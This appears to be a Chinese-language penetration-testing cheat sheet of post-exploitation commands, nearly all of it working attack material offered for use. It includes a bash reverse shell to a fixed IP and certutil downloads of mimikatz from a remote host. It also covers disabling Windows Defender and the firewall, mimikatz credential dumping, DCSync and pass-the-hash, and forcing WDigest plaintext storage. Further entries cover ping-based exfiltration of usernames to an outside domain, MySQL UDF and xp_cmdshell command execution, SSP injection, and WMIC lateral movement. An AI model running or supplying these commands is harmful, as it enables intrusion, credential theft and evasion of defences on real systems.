Linux一句话反弹
bash -i >& /dev/tcp/192.168.1.123/12345 0>&1
Linux敏感文件搜索
find / -name *.properties 2>/dev/null | grep WEB-INF
find / -name "*.properties" | xargs egrep -i "user|pass|pwd|uname|login|db_" find / -regex ".*\.properties\|.*\.conf\|.*\.config" | xargs grep -E "=jdbc:|pass="
find /webapp -regex ".*\.properties" -print 2>/dev/null | xargs grep -E "=jdbc:|rsync"
find / -regex ".*\.properties" -print 2>/dev/null
find / -regex ".*\.properties\|.*\.conf\|.*\.config\|.*\.sh" | xargs grep -E "=jdbc:|pass=|passwd="
grep -r 'setCipherKey(Base64.decode(' /web路径
find / -regex ".*\.xml\|.*\.properties\|.*\.conf\|.*\.config\|.*\.jsp" | xargs grep -E "setCipherKey"
Linux保存shell
#创建新的会话
tmux new -s ccc
#查看会话
tmux ls
#进入会话
tmux a -t ccc
#删除会话
tmux kill-session -t ccc
Linux建立交互shell
# 在反向shell内通过python一句话fork个bash
python -c 'import pty; pty.spawn("/bin/bash")'
#挂起反向shell #本步骤基本实现普通交互shell
Ctrl-Z
echo $TERM #记录$term变量 #xterm
stty -a #记录stty配置 #可忽略 #rows 39; columns 153;
stty raw -echo
fg #通过fg取回挂起的nc #fg不输出 #运行后回车乱码显示
开启3389
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
mimikatz读取rdp密码
"privilege::debug" "sekurlsa::dpapi" "log" "dpapi::cred /in:C:/Users/Administrator/AppData/Local/Microsoft/Credentials/xxxx" "exit"
查看远程桌面端口:
reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber
锁屏:
rundll32.exe user32.dll,LockWorkStation
远程下载:
certutil.exe -urlcache -split -f http://xxxxx/mimikatz.exe
certutil.exe && certutil.exe -urlcache -split -f http://xxxxx/mimikatz.exe //bypass
修改WDigest存储明文:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1
关闭defender:
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /d 1 /t REG_DWORD
#C:\tmp加白名单#
powershell -Command Add-MpPreference -ExclusionPath "C:\tmp"
https://docs.microsoft.com/fr-fr/powershell/module/defender/add-mppreference?view=win10-ps
防火墙:
netsh advfirewall set allprofiles state off
netsh advfirewall set allprofiles state on
读取wifi密码:
for /f "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles') do @echo %j | findstr -i -v echo | netsh wlan show profiles %j key=clear
远程桌面保存凭据:
cmdkey /list
pth
FOR /F %i in (ips.txt) do net use \\%i\ipc$ "admin!@#45" /user:administrator
无回显Linux:
ping `hostname`.xxx.win
ping `id`.xxx.win
ping $(whoami).xxx.win
无回显Windows:
cmd /c for /f %x in ('hostname') do ping -n 1 %x.xxx.win
cmd /c for /f %x in ('whoami') do ping -n 1 %x.xxx.win
ping %USERNAME%.avfisher.win -n 1
添加用户:
net user name password /add
net localgroup administrators name /add
net user name /delete
域内信息收集:
net user /domain //获取域用户列表
net group /domain //查询域内所有用户组列表
net group “Domain Admins” /domain //查询域管理员用户
net group "Domain Controllers" /domain //查看域控制器
net localgroup administrators /domain //查询域内置本地管理员组用户
dir /s /a \\域控\sysvol\*.xml
mimikatz:
privilege::debug
sekurlsa::logonpassword(s)
lsadump::dcsync /domain:test.com /all /csv
xcopy mimikatz \\admin-pc\c$\temp
reg mimikatz:
reg save HKLM\SYSTEM D:\sys.hiv
reg save HKLM\SAM D:\sam.hiv
lsadump::sam /sam:sam.hiv /system:sys.hiv
powershell允许执行脚本:
Set-ExecutionPolicy RemoteSigned
pth:
sekurlsa::pth /user:administrator /domain:workgroup /ntlm:ccef208c6485269c20db2cad21734fe7
sekurlsa::pth /user:administrator /domain:xxx /ntlm:xxxxxxxxxxxxxxxxxxxxx "/run:mstsc.exe /restrictedadmin" //desktop
frp:
[common]
server_addr = xxx
server_port = xxx
token = xxx
[plugin_socks5]
type = tcp
remote_port = xxxx
plugin = socks5
plugin_user = xxx
plugin_passwd = xx
powershell弹框:
Add-Type -AssemblyName Microsoft.VisualBasic; [Microsoft.VisualBasic.Interaction]::MsgBox("xxxxx", "OKOnly,MsgBoxSetForeground,SystemModal,Exclamation", "")
mysql-udf:
show variables like "sec%"
show variables like 'plugin%';
create table temp(data longblob);
insert into temp(data) values (0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000f00000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000000000000000000);
update temp set data = concat(data,0x33c2ede077a383b377a383b377a383b369f110b375a383b369f100b37da383b369f107b375a383b35065f8b374a383b377a382b35ba383b369f10ab376a383b369f116b375a383b369f111b376a383b369f112b376a383b35269636877a383b300000000000000000000000000000000504500006486060070b1834b00000000);
select data from temp into dumpfile "G:\\phpstudy_pro\\Extensions\\MySQL5.7.26\\lib\\plugin\\udf.dll";
create function sys_eval returns string soname 'udf.dll'; #创建函数sys_eval
mssql xp_cmdshell
exec sp_configure 'show advanced options', 1;reconfigure;
exec sp_configure 'xp_cmdshell',1;reconfigure;
exec master..xp_cmdshell 'net user test super123. /add'
登陆日志id
4624 登录成功
4625 登录失败
4634 注销成功
4647 用户启动的注销
4672 使用超级用户/管理员用户进行登录
4720 创建用户
4697 7045 PsExec
ssp
#修改注册表
reg add "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Lsa" /v "Security Packages" /d "mimilib1.dll" /t REG_MULTI_SZ /f
#mimikatz注入
privilege::debug
misc::memssp
springboot内存泄露
select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))
wmic横向
wmic /node:"192.168.1.1" /password:"****" /user:"workgroup\xxxxx" process call create "cmd.exe /c xxxxx'"